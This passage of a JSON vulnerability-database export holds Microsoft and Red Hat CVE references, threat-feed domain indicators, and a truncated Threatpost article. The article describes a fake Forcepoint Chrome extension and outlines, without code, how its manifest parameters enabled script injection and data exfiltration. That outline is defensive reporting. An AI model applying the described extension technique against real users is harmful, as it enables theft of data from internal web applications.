"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26889", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26890", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26895", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26885", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24107", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26892", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24090", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24110", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24095", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26887", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24089", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26878", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27077", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26894", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26884", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26898", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26864", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27061", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26865", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26891", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26893", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26896", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26867", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27049", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27070", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26869", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26868", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26877", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1640", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27062", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26880", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26879", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26870", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26897", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26872", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26861", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26901", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27047", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26881", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26900", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27051", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26882", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26871", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26860", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26863", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26862", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26874", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26873", "http://support.microsoft.com/kb/5000809", "http://support.microsoft.com/kb/5000822", "http://support.microsoft.com/kb/5000847", "http://support.microsoft.com/kb/5000808", "http://support.microsoft.com/kb/5000803", "http://support.microsoft.com/kb/5000807", "http://support.microsoft.com/kb/5000848", "http://support.microsoft.com/kb/5000802", "http://support.microsoft.com/kb/5000853", "http://support.microsoft.com/kb/5000840", "https://portal.msrc.microsoft.com/en-us/security-guidance", "https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-24110", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27077"], "immutableFields": [], "lastseen": "2021-08-18T10:57:38", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_MAR_5000803.NASL", "SMB_NT_MS21_MAR_5000807.NASL", "WINDOWS_ADMIN_CENTER_MS21_MAR.NASL", "SMB_NT_MS21_MAR_5000841.NASL", "SMB_NT_MS21_MAR_5000848.NASL", "SMB_NT_MS21_MAR_HEVC.NASL", "SMB_NT_MS21_MAR_5000802.NASL", "SMB_NT_MS21_MAR_5000847.NASL", "SMB_NT_MS21_MAR_5000844.NASL", "SMB_NT_MS21_MAR_5000822.NASL", "SMB_NT_MS21_MAR_5000809.NASL", "SMB_NT_MS21_MAR_5000808.NASL"]}, {"type": "kaspersky", "idList": ["KLA12112"]}, {"type": "attackerkb", "idList": ["AKB:AC6EF4EB-7075-41DD-BE7A-00DEA8B5BA3F", "AKB:FB71F2C9-B11E-4458-B510-739FF905ECCA", "AKB:9D3FDE28-C33F-4537-BC76-C0F46CFDDA10"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "cve", "idList": ["CVE-2021-26894", "CVE-2021-26898", "CVE-2021-26900", "CVE-2021-26877", "CVE-2021-26862", "CVE-2021-26889", "CVE-2021-26897", "CVE-2021-27050", "CVE-2021-26871", "CVE-2021-26873", "CVE-2021-24107", "CVE-2021-26885", "CVE-2021-26902", "CVE-2021-26890", "CVE-2021-27061", "CVE-2021-26895", "CVE-2021-24089", "CVE-2021-26887", "CVE-2021-26879", "CVE-2021-26896", "CVE-2021-26891", "CVE-2021-26880", "CVE-2021-27077", "CVE-2021-27047", "CVE-2021-26884", "CVE-2021-1640", "CVE-2021-26893", "CVE-2021-26901", "CVE-2021-26875", "CVE-2021-27070", "CVE-2021-26876", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-24090", "CVE-2021-27063", "CVE-2021-26872", "CVE-2021-27051", "CVE-2021-26867", "CVE-2021-26882", "CVE-2021-26870", "CVE-2021-27049", "CVE-2021-26869", "CVE-2021-27062", "CVE-2021-27048", "CVE-2021-26878", "CVE-2021-24095", "CVE-2021-26881", "CVE-2021-26864", "CVE-2021-26892", "CVE-2021-26886", "CVE-2021-26874", "CVE-2021-24110", "CVE-2021-26860", "CVE-2021-1729", "CVE-2021-27066", "CVE-2021-26899", "CVE-2021-26863", "CVE-2021-26861", "CVE-2021-26868"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:54650A68451B75723C5A9B2F8A177154"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-27077/", "MSF:ILITIES/MSFT-CVE-2021-26863/", "MSF:ILITIES/MSFT-CVE-2021-26870/", "MSF:ILITIES/MSFT-CVE-2021-26865/", "MSF:ILITIES/MSFT-CVE-2021-26867/", "MSF:ILITIES/MSFT-CVE-2021-26893/", "MSF:ILITIES/MSFT-CVE-2021-26874/"]}, {"type": "mskb", "idList": ["KB5000802", "KB5000808"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5"]}, {"type": "mscve", "idList": ["MS:CVE-2021-27051", "MS:CVE-2018-16794", "MS:CVE-2021-27049", "MS:CVE-2021-24089", "MS:CVE-2021-27050", "MS:CVE-2021-26902", "MS:CVE-2021-27047", "MS:CVE-2021-24110", "MS:CVE-2021-27066", "MS:CVE-2021-27048", "MS:CVE-2021-27061", "MS:CVE-2021-27062"]}, {"type": "zdi", "idList": ["ZDI-21-329"]}], "modified": "2021-08-18T10:57:38", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-08-18T10:57:38", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.kaspersky.KasperskyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.kaspersky.KasperskyBulletin"]}], "redhatcve": [{"id": "RH:CVE-2020-27066", "hash": "5ffd434ebb58f342359cb2c95392080c", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2020-27066", "description": "A flaw was found in the Linux kernel. There is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.\n#### Mitigation\n\nTo mitigate this issue, prevent the module xfrm6_tunnel from being loaded. \nPlease see <https://access.redhat.com/solutions/41278> for information on how to blacklist a kernel module to prevent it from loading automatically. \n\n", "published": "2021-02-15T13:03:44", "modified": "2021-05-27T23:07:02", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "href": "https://access.redhat.com/security/cve/cve-2020-27066", "reporter": "redhat.com", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1928716"], "cvelist": ["CVE-2020-27066"], "immutableFields": [], "lastseen": "2021-09-02T22:31:27", "history": [{"bulletin": {"id": "RH:CVE-2020-27066", "hash": "eac20b5dee0303b35b95fb3e1c43e79e", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2020-27066", "description": "A flaw was found in the Linux kernel. There is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.\n", "published": "2021-02-15T13:03:44", "modified": "2021-04-01T10:12:33", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/security/cve/cve-2020-27066", "reporter": "redhat.com", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01\nhttps://www.linuxkernelcves.com/cves/CVE-2020-27066"], "cvelist": ["CVE-2020-27066"], "immutableFields": [], "lastseen": "2021-05-07T17:30:31", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-27066"]}], "modified": "2021-05-07T17:30:31", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-05-07T17:30:31", "rev": 2}}, "objectVersion": "1.5", "vendorCvss": {}}, "lastseen": "2021-05-07T17:30:31", "differentElements": ["description", "references"], "edition": 1}, {"bulletin": {"id": "RH:CVE-2020-27066", "hash": "d7e5249ba745ae130fdb9c6da23470e4", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2020-27066", "description": "A flaw was found in the Linux kernel. There is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.\n#### Mitigation\n\nTo mitigate this issue, prevent the module xfrm6_tunnel from being loaded. \nPlease see <https://access.redhat.com/solutions/41278> for information on how to blacklist a kernel module to prevent it from loading automatically. \n\n", "published": "2021-02-15T13:03:44", "modified": "2021-04-01T10:12:33", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/security/cve/cve-2020-27066", "reporter": "redhat.com", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01\nhttps://www.linuxkernelcves.com/cves/CVE-2020-27066", "https://bugzilla.redhat.com/show_bug.cgi?id=1928716"], "cvelist": ["CVE-2020-27066"], "immutableFields": [], "lastseen": "2021-05-19T23:31:54", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-27066"]}], "modified": "2021-05-19T23:31:54", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-05-19T23:31:54", "rev": 2}}, "objectVersion": "1.5", "vendorCvss": {}}, "lastseen": "2021-05-19T23:31:54", "differentElements": ["modified", "references"], "edition": 2}, {"bulletin": {"id": "RH:CVE-2020-27066", "hash": "f464142dc3e14f4ab932d3f20ea14b44", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2020-27066", "description": "A flaw was found in the Linux kernel. There is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.\n#### Mitigation\n\nTo mitigate this issue, prevent the module xfrm6_tunnel from being loaded. \nPlease see <https://access.redhat.com/solutions/41278> for information on how to blacklist a kernel module to prevent it from loading automatically. \n\n", "published": "2021-02-15T13:03:44", "modified": "2021-05-27T23:07:02", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/security/cve/cve-2020-27066", "reporter": "redhat.com", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1928716"], "cvelist": ["CVE-2020-27066"], "immutableFields": [], "lastseen": "2021-05-27T23:32:43", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-27066"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-27066"]}], "modified": "2021-05-27T23:32:43", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-05-27T23:32:43", "rev": 2}}, "objectVersion": "1.5", "vendorCvss": {}}, "lastseen": "2021-05-27T23:32:43", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "RH:CVE-2020-27066", "hash": "6b1634bede417b1c64c654d2e2fc3b56", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2020-27066", "description": "A flaw was found in the Linux kernel. There is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.\n#### Mitigation\n\nTo mitigate this issue, prevent the module xfrm6_tunnel from being loaded. \nPlease see <https://access.redhat.com/solutions/41278> for information on how to blacklist a kernel module to prevent it from loading automatically. \n\n", "published": "2021-02-15T13:03:44", "modified": "2021-05-27T23:07:02", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "href": "https://access.redhat.com/security/cve/cve-2020-27066", "reporter": "redhat.com", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1928716"], "cvelist": ["CVE-2020-27066"], "immutableFields": [], "lastseen": "2021-07-29T16:40:05", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-27066"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-27066"]}], "modified": "2021-07-29T16:40:05", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-07-29T16:40:05", "rev": 2}}, "objectVersion": "1.6", "vendorCvss": {}}, "lastseen": "2021-07-29T16:40:05", "differentElements": ["vendorCvss"], "edition": 4}], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2020-27066"]}, {"type": "cve", "idList": ["CVE-2020-27066"]}], "modified": "2021-09-02T22:31:27", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-09-02T22:31:27", "rev": 2}}, "objectVersion": "1.6", "vendorCvss": {"score": "6.7", "vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "_object_type": "robots.models.redhatcve.RedhatCVEBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhatcve.RedhatCVEBulletin"]}], "rst": [{"id": "RST:9B8A27AB-EDBB-3FA4-93C2-B8F3AFFB1B52", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 27066.xc.wenpie.com", "description": "Found **27066[.]xc.wenpie.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-02-14T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-02-15T00:00:00", "modified": "2020-12-22T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-02-14T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "bbec587cff6643f79fb5055e098bac3b"}, {"key": "domain", "hash": "392f62326b3069c64f8fc5eb39392ea8"}, {"key": "fp", "hash": "9d97992b693836dd9899dfe1498c710f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "eaf8a923eccb994cf72fcb0253dc7988"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "548afddb941bc9ce879976084c7bcc9e"}, {"key": "published", "hash": "1d62df33cc8002836f45414605bb67bd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "255035b1328ac2de69a272b0442ff529"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "4dfffe14d7fab854613ba312834baf91a884ab3bae1873e0a3748da410ee16d7", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "domain", "ip": [], "domain": ["27066.xc.wenpie.com"], "url": [], "iocScore": {"ioc_frequency": 0.46, "ioc_src": 46.71, "ioc_tags": 0.8, "ioc_total": 10.0}, "tags": ["generic"], "fp": {"alarm": "true", "descr": "Domain not resolved. Whois records not found"}, "whois": {}, "geodata": {}, "asn": {}, "threat": []}, {"id": "RST:E9F62122-D25D-33E8-B5F4-2A34A4D7D047", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 0.0.0.0 27066.xc.wenpie.com", "description": "Found **0[.]0.0.0 27066.xc.wenpie.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-15T03:00:00, Last seen: 2021-02-15T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-02-15T00:00:00", "modified": "2021-02-15T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-02-15T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "b7796771285a7f60e9b17394abecb0ed"}, {"key": "domain", "hash": "656aea74d17577110de09ebe977c596e"}, {"key": "fp", "hash": "9d97992b693836dd9899dfe1498c710f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "90771cba8fcae1b6b7133aeadbb7abdc"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "1d62df33cc8002836f45414605bb67bd"}, {"key": "published", "hash": "1d62df33cc8002836f45414605bb67bd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "3bd11fe506cdd77cd63436312e3a0c97"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "23b078333e7db9204a5aa36d988f0c11657c017581564b5efa3b083a7f1c7cbb", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "domain", "ip": [], "domain": ["0.0.0.0 27066.xc.wenpie.com"], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 46.71, "ioc_tags": 0.8, "ioc_total": 10.0}, "tags": ["generic"], "fp": {"alarm": "true", "descr": "Domain not resolved. Whois records not found"}, "whois": {}, "geodata": {}, "asn": {}, "threat": []}, {"id": "RST:7D350FCF-2276-3305-8A32-F45D69632A17", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 0.0.0.0 www.27066.xc.wenpie.com", "description": "Found **0[.]0.0.0 www.27066.xc.wenpie.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-15T03:00:00, Last seen: 2021-02-15T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-02-15T00:00:00", "modified": "2021-02-15T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-02-15T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "a6990a106b0d28d9051185b0705a66e9"}, {"key": "domain", "hash": "d289bbd855a2898c0221ab66f3d25001"}, {"key": "fp", "hash": "9d97992b693836dd9899dfe1498c710f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "90771cba8fcae1b6b7133aeadbb7abdc"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "1d62df33cc8002836f45414605bb67bd"}, {"key": "published", "hash": "1d62df33cc8002836f45414605bb67bd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "15c8489f399e63516c24e3fcb57e037d"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "33e85c5122481a11ccbe716a71fc7acca063da13c47a60684d333d815a2feebe", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "domain", "ip": [], "domain": ["0.0.0.0 www.27066.xc.wenpie.com"], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 46.71, "ioc_tags": 0.8, "ioc_total": 10.0}, "tags": ["generic"], "fp": {"alarm": "true", "descr": "Domain not resolved. Whois records not found"}, "whois": {}, "geodata": {}, "asn": {}, "threat": []}], "threatpost": [{"id": "THREATPOST:F0C4D2010A95AF93466BEEDF3E4BEDB2", "hash": "e358a0a90e8a40b8b1fe5d04aed73257", "type": "threatpost", "bulletinFamily": "info", "title": "Fake Forcepoint Chrome Extension Hacks Windows Users", "description": "Cybercriminals have been using a novel approach to exfiltrate data that involves directly injecting malicious Google Chrome extensions onto victims\u2019 Windows machines via the abuse of Google\u2019s cloud synching function.\n\nThe goal of the recently-identified campaign is to manipulate data in internal web applications that the victims have access to, according to an analysis.\n\nAccording to Bojan Zdrnja, writing for the SANS Institute, attackers are directly planting malicious extensions on the targets\u2019 computers, rather than [uploading them to the Chrome Web Store](<https://threatpost.com/500-malicious-chrome-extensions-millions/152918/#:~:text=The%20malicious%20Chrome%20extensions%20were,them%20to%20malware%2Dlaced%20websites.&text=But%20researchers%20said%20that%20the,that%20also%20harvested%20browser%20data.>) and waiting for victims to download them.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe malicious add-on is disguised as a \u201cForcepoint Endpoint Chrome Extension for Windows,\u201d with the attackers using the security company\u2019s logo to enhance an air of legitimacy.\n\nThe threat actors \u201cdropped the extension locally in a folder and loaded it directly from Chrome on a compromised workstation,\u201d explained Zdrnja, in [an analysis](<https://isc.sans.edu/diary/rss/27066>) late last week. \u201cThis is actually a legitimate function in Chrome \u2013 you can access it by going to More Tools -&gt; Extensions and enabling Developer mode, after which you can load any extensions locally, directly from a folder by clicking on \u2018Load unpacked.'\u201d\n\nThe analysis doesn\u2019t detail how the initial compromise was carried out. However, when it comes to the attack goal, \u201cthey actually limited activities on this workstation to those related to web applications, which explains why they dropped only the malicious Chrome extension, and not any other binaries,\u201d the researcher explained. \u201cThat being said, it also makes sense \u2013 almost everything is managed through a web application today, be it your internal CRM, document management system, access rights management system or something else.\u201d\n\n## **How to Create a Malicious Google Chrome Extension**\n\nFor all Chrome extensions, configuration parameters are stored in a file named manifest.json. In the case of the faux Forcepoint extension, three specific malicious functions stood out to Zdrnja.\n\nThe authors used a \u201ccontent_scripts\u201d parameter to define which JavaScript files will be injected into web pages by the extension.\n\n\u201ccan be used by an attacker to add arbitrary code to target web pages (think about changing content and stealing data),\u201d the researcher noted.\n\nNext, a permissions parameter specified that the extension can use the storage API.\n\nAnd finally, the background parameter specifies JavaScript files that will run when extension is loaded.\n\n\u201cThis is where the attacker had their exfiltration and command-and-control features embedded,\u201d he added. \u201cBackground files are extremely powerful and allow a script to receive a message (and send it) in background (as the name says).\u201d\n\n## **\u2018Chats\u2019 with Legit Extensions to Steal Data**\n\nThe authors of the malicious Forcepoint add-on were able to steal information from users\u2019 internal extensions thanks to setting up a 